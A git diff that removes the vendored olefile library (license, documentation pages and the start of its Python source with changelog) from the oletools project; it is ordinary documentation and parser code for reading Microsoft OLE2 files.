-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/License.md b/oletools/thirdparty/olefile/doc/License.md
deleted file mode 100644
index 28bc4c13..00000000
--- a/oletools/thirdparty/olefile/doc/License.md
+++ /dev/null
@@ -1,54 +0,0 @@
-License for olefile
-===================
-
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2015 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info))
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-----------
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/OLE_Overview.html b/oletools/thirdparty/olefile/doc/OLE_Overview.html
deleted file mode 100644
index ed481201..00000000
--- a/oletools/thirdparty/olefile/doc/OLE_Overview.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-
-
-
-
-
-
-
-About the structure of OLE files
-This page is part of the documentation for olefile. It provides a brief overview of the structure of Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-An OLE file can be seen as a mini file system or a Zip archive: It contains streams of data that look like files embedded within the OLE file. Each stream has a name. For example, the main stream of a MS Word document containing its text is named "WordDocument".
-An OLE file can also contain storages. A storage is a folder that contains streams or other storages. For example, a MS Word document with VBA macros has a storage called "Macros".
-Special streams can contain properties. A property is a specific value that can be used to store information such as the metadata of a document (title, author, creation date, etc). Property stream names usually start with the character '05'.
-For example, a typical MS Word document may look like this:
-
-
-
-Go to the API page to see how to use all olefile features to parse OLE files.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/OLE_Overview.md b/oletools/thirdparty/olefile/doc/OLE_Overview.md
deleted file mode 100644
index db7fa668..00000000
--- a/oletools/thirdparty/olefile/doc/OLE_Overview.md
+++ /dev/null
@@ -1,29 +0,0 @@
-About the structure of OLE files
-================================
-
-This page is part of the documentation for [olefile](https://bitbucket.org/decalage/olefileio_pl/wiki). It provides a brief overview of the structure of [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-
-An OLE file can be seen as a mini file system or a Zip archive: It contains **streams** of data that look like files embedded within the OLE file. Each stream has a name. For example, the main stream of a MS Word document containing its text is named "WordDocument".
-
-An OLE file can also contain **storages**. A storage is a folder that contains streams or other storages. For example, a MS Word document with VBA macros has a storage called "Macros".
-
-Special streams can contain **properties**. A property is a specific value that can be used to store information such as the metadata of a document (title, author, creation date, etc). Property stream names usually start with the character '\x05'.
-
-For example, a typical MS Word document may look like this:
-
-![](OLE_VBA_sample.png)
-
-Go to the [[API]] page to see how to use all olefile features to parse OLE files.
-
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png b/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png
deleted file mode 100644
index 93f74d5e..00000000
Binary files a/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png and /dev/null differ
diff --git a/oletools/thirdparty/olefile/olefile.html b/oletools/thirdparty/olefile/olefile.html
deleted file mode 100644
index b7d1981a..00000000
--- a/oletools/thirdparty/olefile/olefile.html
+++ /dev/null
@@ -1,432 +0,0 @@
-
-
-Python: module olefile
-
-
-
-
-
-
olefile (version 0.42, 2015-01-24) index
.\olefile.py
- # olefile (formerly OleFileIO_PL) version 0.42 2015-01-24
-#
-# Module to read/write Microsoft OLE2 files (also called Structured Storage or
-# Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-# documents, Image Composer and FlashPix files, Outlook messages, ...
-# This version is compatible with Python 2.6+ and 3.x
-#
-# Project website: http://www.decalage.info/olefile
-#
-# olefile is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-#
-# olefile is based on the OleFileIO module from the PIL library v1.1.6
-# See: http://www.pythonware.com/products/pil/index.htm
-#
-# The Python Imaging Library (PIL) is
-# Copyright (c) 1997-2005 by Secret Labs AB
-# Copyright (c) 1995-2005 by Fredrik Lundh
-#
-# See source code and LICENSE.txt for information on usage and redistribution.
-
-
-
-
-Modules
-
-
-array
-datetime
- io
-os
- struct
-sys
-
-
-
-
-Classes
-
-
-
-- OleFileIO
-
- OleMetadata
-
-
-
-
-
-class OleFileIO
-
-
-OLE container object
-
-This class encapsulates the interface to an OLE 2 structured
-storage file. Use the listdir and openstream methods to
-access the contents of this file.
-
-Object names are given as a list of strings, one for each subentry
-level. The root entry should be omitted. For example, the following
-code extracts all image streams from a Microsoft Image Composer file::
-
- ole = OleFileIO("fan.mic")
-
- for entry in ole.listdir():
- if entry[1:2] == "Image":
- fin = ole.openstream(entry)
- fout = open(entry[0:1], "wb")
- while True:
- s = fin.read(8192)
- if not s:
- break
- fout.write(s)
-
-You can use the viewer application provided with the Python Imaging
-Library to view the resulting files (which happens to be standard
-TIFF files).
-
-Methods defined here:
-- __init__(self, filename=None, raise_defects=40, write_mode=False, debug=False, path_encoding='utf-8')
- Constructor for the OleFileIO class.
-
-:param filename: file to open.
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
-:param raise_defects: minimal level for defects to be raised as exceptions.
- (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
- security-oriented application, see source code for details)
-
-:param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default.
-
-:param debug: bool, set debug mode
-
-:param path_encoding: None or str, name of the codec to use for path
- names (streams and storages), or None for Unicode.
- Unicode by default on Python 3+, UTF-8 on Python 2.x.
- (new in olefile 0.42, was hardcoded to Latin-1 until olefile v0.41)
-
-- close(self)
- close the OLE file, to release the file object
-
-- dumpdirectory(self)
- Dump directory (for debugging only)
-
-- dumpfat(self, fat, firstindex=0)
- Displays a part of FAT in human-readable form for debugging purpose
-
-- dumpsect(self, sector, firstindex=0)
- Displays a sector in a human-readable form, for debugging purpose.
-
-- exists(self, filename)
- Test if given filename exists as a stream or a storage in the OLE
-container.
-Note: filename is case-insensitive.
-
-:param filename: path of stream in storage tree. (see openstream for syntax)
-:returns: True if object exist, else False.
-
-- get_metadata(self)
- Parse standard properties streams, return an OleMetadata object
-containing all the available metadata.
-(also stored in the metadata attribute of the OleFileIO object)
-
-new in version 0.25
-
-- get_rootentry_name(self)
- Return root entry name. Should usually be 'Root Entry' or 'R' in most
-implementations.
-
-- get_size(self, filename)
- Return size of a stream in the OLE container, in bytes.
-
-:param filename: path of stream in storage tree (see openstream for syntax)
-:returns: size in bytes (long integer)
-:exception IOError: if file not found
-:exception TypeError: if this is not a stream.
-
-- get_type(self, filename)
- Test if given filename exists as a stream or a storage in the OLE
-container, and return its type.
-
-:param filename: path of stream in storage tree. (see openstream for syntax)
-:returns: False if object does not exist, its entry type (>0) otherwise:
-
- - STGTY_STREAM: a stream
- - STGTY_STORAGE: a storage
- - STGTY_ROOT: the root entry
-
-- getctime(self, filename)
- Return creation time of a stream/storage.
-
-:param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
-:returns: None if creation time is null, a python datetime object
- otherwise (UTC timezone)
-
-new in version 0.26
-
-- getmtime(self, filename)
- Return modification time of a stream/storage.
-
-:param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
-:returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
-new in version 0.26
-
-- getproperties(self, filename, convert_time=False, no_conversion=None)
- Return properties described in substream.
-
-:param filename: path of stream in storage tree (see openstream for syntax)
-:param convert_time: bool, if True timestamps will be converted to Python datetime
-:param no_conversion: None or list of int, timestamps not to be converted
- (for example total editing time is not a real timestamp)
-
-:returns: a dictionary of values indexed by id (integer)
-
-- getsect(self, sect)
- Read given sector from file on disk.
-
-:param sect: int, sector index
-:returns: a string containing the sector data.
-
-- listdir(self, streams=True, storages=False)
- Return a list of streams and/or storages stored in this file
-
-:param streams: bool, include streams if True (True by default) - new in v0.26
-:param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
-:returns: list of stream and/or storage paths
-
-- loaddirectory(self, sect)
- Load the directory.
-
-:param sect: sector index of directory stream.
-
-- loadfat(self, header)
- Load the FAT table.
-
-- loadfat_sect(self, sect)
- Adds the indexes of the given sector to the FAT
-
-:param sect: string containing the first FAT sector, or array of long integers
-:returns: index of last FAT sector.
-
-- loadminifat(self)
- Load the MiniFAT table.
-
-- open(self, filename, write_mode=False)
- Open an OLE2 file in read-only or read/write mode.
-Read and parse the header, FAT and directory.
-
-:param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
-:param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default. (ignored if filename is not a path)
-
-- openstream(self, filename)
- Open a stream as a read-only file object (BytesIO).
-Note: filename is case-insensitive.
-
-:param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
-:returns: file object (read-only)
-:exception IOError: if filename not found, or if this is not a stream.
-
-- sect2array(self, sect)
- convert a sector to an array of 32 bits unsigned integers,
-swapping bytes on big endian CPUs such as PowerPC (old Macs)
-
-- write_sect(self, sect, data, padding='\x00')
- Write given sector to file on disk.
-
-:param sect: int, sector index
-:param data: bytes, sector data
-:param padding: single byte, padding character if data < sector size
-
-- write_stream(self, stream_name, data)
- Write a stream to disk. For now, it is only possible to replace an
-existing stream by data of the same size.
-
-:param stream_name: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
-:param data: bytes, data to be written, must be the same size as the original
- stream.
-
-
-
-
-
-class OleMetadata
-
-
-class to parse and store metadata from standard properties of OLE files.
-
-Available attributes:
-codepage, title, subject, author, keywords, comments, template,
-last_saved_by, revision_number, total_edit_time, last_printed, create_time,
-last_saved_time, num_pages, num_words, num_chars, thumbnail,
-creating_application, security, codepage_doc, category, presentation_target,
-bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
-scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
-chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
-version, dig_sig, content_type, content_status, language, doc_version
-
-Note: an attribute is set to None when not present in the properties of the
-OLE file.
-
-References for SummaryInformation stream:
-- http://msdn.microsoft.com/en-us/library/dd942545.aspx
-- http://msdn.microsoft.com/en-us/library/dd925819%28v=office.12%29.aspx
-- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380376%28v=vs.85%29.aspx
-- http://msdn.microsoft.com/en-us/library/aa372045.aspx
-- http://sedna-soft.de/summary-information-stream/
-- http://poi.apache.org/apidocs/org/apache/poi/hpsf/SummaryInformation.html
-
-References for DocumentSummaryInformation stream:
-- http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
-- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380374%28v=vs.85%29.aspx
-- http://poi.apache.org/apidocs/org/apache/poi/hpsf/DocumentSummaryInformation.html
-
-new in version 0.25
-
-Methods defined here:
-- __init__(self)
- Constructor for OleMetadata
-All attributes are set to None by default
-
-- dump(self)
- Dump all metadata, for debugging purposes.
-
-- parse_properties(self, olefile)
- Parse standard properties of an OLE file, from the streams
-"SummaryInformation" and "DocumentSummaryInformation",
-if present.
-Properties are converted to strings, integers or python datetime objects.
-If a property is not present, its value is set to None.
-
-
-Data and other attributes defined here:
-- DOCSUM_ATTRIBS = ['codepage_doc', 'category', 'presentation_target', 'bytes', 'lines', 'paragraphs', 'slides', 'notes', 'hidden_slides', 'mm_clips', 'scale_crop', 'heading_pairs', 'titles_of_parts', 'manager', 'company', 'links_dirty', 'chars_with_spaces', 'unused', 'shared_doc', 'link_base', ...]
-
-- SUMMARY_ATTRIBS = ['codepage', 'title', 'subject', 'author', 'keywords', 'comments', 'template', 'last_saved_by', 'revision_number', 'total_edit_time', 'last_printed', 'create_time', 'last_saved_time', 'num_pages', 'num_words', 'num_chars', 'thumbnail', 'creating_application', 'security']
-
-
-
-
-
-Functions
-
-
-- debug = debug_pass(msg)
- - debug_pass(msg)
- - debug_print(msg)
- - filetime2datetime(filetime)
- convert FILETIME (64 bits int) to Python datetime.datetime
- - i16(c, o=0)
- Converts a 2-bytes (16 bits) string to an integer.
-
-:param c: string containing bytes to convert
-:param o: offset of bytes to convert in string
- - i32(c, o=0)
- Converts a 4-bytes (32 bits) string to an integer.
-
-:param c: string containing bytes to convert
-:param o: offset of bytes to convert in string
- - i8(c)
- # version for Python 2.x
- - isOleFile(filename)
- Test if a file is an OLE container (according to the magic bytes in its header).
-
-:param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read and seek methods),
- it is parsed as-is.
-
-:returns: True if OLE, False otherwise.
- - set_debug_mode(debug_mode)
- Set debug mode on or off, to control display of debugging messages.
-:param mode: True or False
-
-
-
-
-Data
-
-
-DEBUG_MODE = False
-DEFAULT_PATH_ENCODING = 'utf-8'
-DEFECT_FATAL = 40
-DEFECT_INCORRECT = 30
-DEFECT_POTENTIAL = 20
-DEFECT_UNSURE = 10
-DIFSECT = 4294967292L
-ENDOFCHAIN = 4294967294L
-FATSECT = 4294967293L
-FREESECT = 4294967295L
-KEEP_UNICODE_NAMES = True
-MAGIC = '\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'
-MAXREGSECT = 4294967290L
-MAXREGSID = 4294967290L
-MINIMAL_OLEFILE_SIZE = 1536
-NOSTREAM = 4294967295L
-STGTY_EMPTY = 0
-STGTY_LOCKBYTES = 3
-STGTY_PROPERTY = 4
-STGTY_ROOT = 5
-STGTY_STORAGE = 1
-STGTY_STREAM = 2
-UINT32 = 'L'
-VT = {0: 'VT_EMPTY', 1: 'VT_NULL', 2: 'VT_I2', 3: 'VT_I4', 4: 'VT_R4', 5: 'VT_R8', 6: 'VT_CY', 7: 'VT_DATE', 8: 'VT_BSTR', 9: 'VT_DISPATCH', ...}
-VT_BLOB = 65
-VT_BLOB_OBJECT = 70
-VT_BOOL = 11
-VT_BSTR = 8
-VT_CARRAY = 28
-VT_CF = 71
-VT_CLSID = 72
-VT_CY = 6
-VT_DATE = 7
-VT_DECIMAL = 14
-VT_DISPATCH = 9
-VT_EMPTY = 0
-VT_ERROR = 10
-VT_FILETIME = 64
-VT_HRESULT = 25
-VT_I1 = 16
-VT_I2 = 2
-VT_I4 = 3
-VT_I8 = 20
-VT_INT = 22
-VT_LPSTR = 30
-VT_LPWSTR = 31
-VT_NULL = 1
-VT_PTR = 26
-VT_R4 = 4
-VT_R8 = 5
-VT_SAFEARRAY = 27
-VT_STORAGE = 67
-VT_STORED_OBJECT = 69
-VT_STREAM = 66
-VT_STREAMED_OBJECT = 68
-VT_UI1 = 17
-VT_UI2 = 18
-VT_UI4 = 19
-VT_UI8 = 21
-VT_UINT = 23
-VT_UNKNOWN = 13
-VT_USERDEFINED = 29
-VT_VARIANT = 12
-VT_VECTOR = 4096
-VT_VOID = 24
-WORD_CLSID = '00020900-0000-0000-C000-000000000046'
-__author__ = 'Philippe Lagadec'
-__date__ = '2015-01-24'
-__version__ = '0.42'
-keyword = 'VT_UNKNOWN'
-print_function = _Feature((2, 6, 0, 'alpha', 2), (3, 0, 0, 'alpha', 0), 65536)
-var = 13
-
-
-
-Author
-
-
-Philippe Lagadec
-
\ No newline at end of file
diff --git a/oletools/thirdparty/olefile/olefile.py b/oletools/thirdparty/olefile/olefile.py
deleted file mode 100644
index 1c4b50a3..00000000
--- a/oletools/thirdparty/olefile/olefile.py
+++ /dev/null
@@ -1,2476 +0,0 @@
-"""
-olefile (formerly OleFileIO_PL)
-
-Module to read/write Microsoft OLE2 files (also called Structured Storage or
-Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-documents, Image Composer and FlashPix files, Outlook messages, ...
-This version is compatible with Python 2.6+ and 3.x
-
-Project website: https://www.decalage.info/olefile
-
-olefile is copyright (c) 2005-2017 Philippe Lagadec
-(https://www.decalage.info)
-
-olefile is based on the OleFileIO module from the PIL library v1.1.7
-See: http://www.pythonware.com/products/pil/index.htm
-and http://svn.effbot.org/public/tags/pil-1.1.7/PIL/OleFileIO.py
-
-The Python Imaging Library (PIL) is
-Copyright (c) 1997-2009 by Secret Labs AB
-Copyright (c) 1995-2009 by Fredrik Lundh
-
-See source code and LICENSE.txt for information on usage and redistribution.
-"""
-
-# Since OleFileIO_PL v0.30, only Python 2.6+ and 3.x is supported
-# This import enables print() as a function rather than a keyword
-# (main requirement to be compatible with Python 3.x)
-# The comment on the line below should be printed on Python 2.5 or older:
-from __future__ import print_function # This version of olefile requires Python 2.6+ or 3.x.
-
-
-#--- LICENSE ------------------------------------------------------------------
-
-# olefile (formerly OleFileIO_PL) is copyright (c) 2005-2017 Philippe Lagadec
-# (https://www.decalage.info)
-#
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# ----------
-# PIL License:
-#
-# olefile is based on source code from the OleFileIO module of the Python
-# Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-# The Python Imaging Library (PIL) is
-# Copyright (c) 1997-2009 by Secret Labs AB
-# Copyright (c) 1995-2009 by Fredrik Lundh
-#
-# By obtaining, using, and/or copying this software and/or its associated
-# documentation, you agree that you have read, understood, and will comply with
-# the following terms and conditions:
-#
-# Permission to use, copy, modify, and distribute this software and its
-# associated documentation for any purpose and without fee is hereby granted,
-# provided that the above copyright notice appears in all copies, and that both
-# that copyright notice and this permission notice appear in supporting
-# documentation, and that the name of Secret Labs AB or the author(s) not be used
-# in advertising or publicity pertaining to distribution of the software
-# without specific, written prior permission.
-#
-# SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
-# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS.
-# IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL,
-# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
-# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
-# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
-# PERFORMANCE OF THIS SOFTWARE.
-
-#-----------------------------------------------------------------------------
-# CHANGELOG: (only olefile/OleFileIO_PL changes compared to PIL 1.1.6)
-# 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility
-# (all changes flagged with [PL])
-# 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise
-# exceptions in OleStream.__init__()
-# 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat)
-# - added some constants
-# - added header values checks
-# - added some docstrings
-# - getsect: bugfix in case sectors >512 bytes
-# - getsect: added conformity checks
-# - DEBUG_MODE constant to activate debug display
-# 2007-09-04 v0.13 PL: - improved/translated (lots of) comments
-# - updated license
-# - converted tabs to 4 spaces
-# 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity
-# - improved _unicode() to use Python 2.x unicode support
-# - fixed bug in OleDirectoryEntry
-# 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops
-# - fixed OleStream which didn't check stream size
-# - added/improved many docstrings and comments
-# - moved helper functions _unicode and _clsid out of
-# OleFileIO class
-# - improved OleFileIO._find() to add Unix path syntax
-# - OleFileIO._find() is now case-insensitive
-# - added get_type() and get_rootentry_name()
-# - rewritten loaddirectory and OleDirectoryEntry
-# 2007-11-27 v0.16 PL: - added OleDirectoryEntry.kids_dict
-# - added detection of duplicate filenames in storages
-# - added detection of duplicate references to streams
-# - added get_size() and exists() to OleDirectoryEntry
-# - added isOleFile to check header before parsing
-# - added __all__ list to control public keywords in pydoc
-# 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory
-# - improved _unicode(), added workarounds for Python <2.3
-# - added set_debug_mode and -d option to set debug mode
-# - fixed bugs in OleFileIO.open and OleDirectoryEntry
-# - added safety check in main for large or binary
-# properties
-# - allow size>0 for storages for some implementations
-# 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and
-# streams
-# - added option '-c' in main to check all streams
-# 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms
-# (thanks to Ben G. and Martijn for reporting the bug)
-# 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str
-# 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs
-# 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn
-# (https://github.com/decalage2/olefile/issues/7)
-# - added close method to OleFileIO (fixed issue #2)
-# 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr)
-# 2013-05-05 v0.24 PL: - getproperties: added conversion from filetime to python
-# datetime
-# - main: displays properties with date format
-# - new class OleMetadata to parse standard properties
-# - added get_metadata method
-# 2013-05-07 v0.24 PL: - a few improvements in OleMetadata
-# 2013-05-24 v0.25 PL: - getproperties: option to not convert some timestamps
-# - OleMetaData: total_edit_time is now a number of seconds,
-# not a timestamp
-# - getproperties: added support for VT_BOOL, VT_INT, V_UINT
-# - getproperties: filter out null chars from strings
-# - getproperties: raise non-fatal defects instead of
-# exceptions when properties cannot be parsed properly
-# 2013-05-27 PL: - getproperties: improved exception handling
-# - _raise_defect: added option to set exception type
-# - all non-fatal issues are now recorded, and displayed
-# when run as a script
-# 2013-07-11 v0.26 PL: - added methods to get modification and creation times
-# of a directory entry or a storage/stream
-# - fixed parsing of direntry timestamps
-# 2013-07-24 PL: - new options in listdir to list storages and/or streams
-# 2014-02-04 v0.30 PL: - upgraded code to support Python 3.x by Martin Panter
-# - several fixes for Python 2.6 (xrange, MAGIC)
-# - reused i32 from Pillow's _binary
-# 2014-07-18 v0.31 - preliminary support for 4K sectors
-# 2014-07-27 v0.31 PL: - a few improvements in OleFileIO.open (header parsing)
-# - Fixed loadfat for large files with 4K sectors (issue #3)
